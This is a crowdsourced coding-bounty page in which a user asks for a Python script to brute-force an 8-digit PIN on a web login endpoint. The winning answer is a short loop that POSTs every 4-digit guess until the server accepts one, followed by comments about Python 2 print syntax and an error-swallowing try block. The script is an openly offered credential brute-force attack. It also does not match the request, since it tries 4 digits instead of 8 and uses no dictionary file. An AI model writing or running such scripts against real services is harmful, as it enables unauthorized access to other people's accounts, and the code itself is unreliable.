simple brute force python script
New here? Learn about Bountify and follow @bountify to get notified of new bounties! x

Hi

Supposing we have endpoint as https://example.com/

and we have parameters of the POST request to the endpoint.

I want a python script to make a post request to an endpoint and brute force the XXXX 8 digits pin using a dictionary file.

awarded to guy_do_or_die
Tags
python

Crowdsource coding tasks.

1 Solution

Winning solution

from requests import post
url = 'http://example.com/api/auth?param1=value1&param2=value2&password=%s'
for k in range(0, 10000):
    try:
        password = str(k).zfill(4)
        if post(url % password).ok:
           print password
           break
    except:
        pass
it is a post request, and it checks for 200 in if post(url % password).ok
guy_do_or_die 1 month ago
nope, it means POST request with params in URL ) but you can also pass it like that post(url, data=dict(param1=value, param2=value2, password=password)), if you wish
guy_do_or_die 1 month ago
which python? if it's 3+, then there should be print(password)
guy_do_or_die 1 month ago
Thank you!
privcrawler 1 month ago
it seems like it falls out in try-catch block, pls, remove those lines and let me know what is the error
guy_do_or_die 1 month ago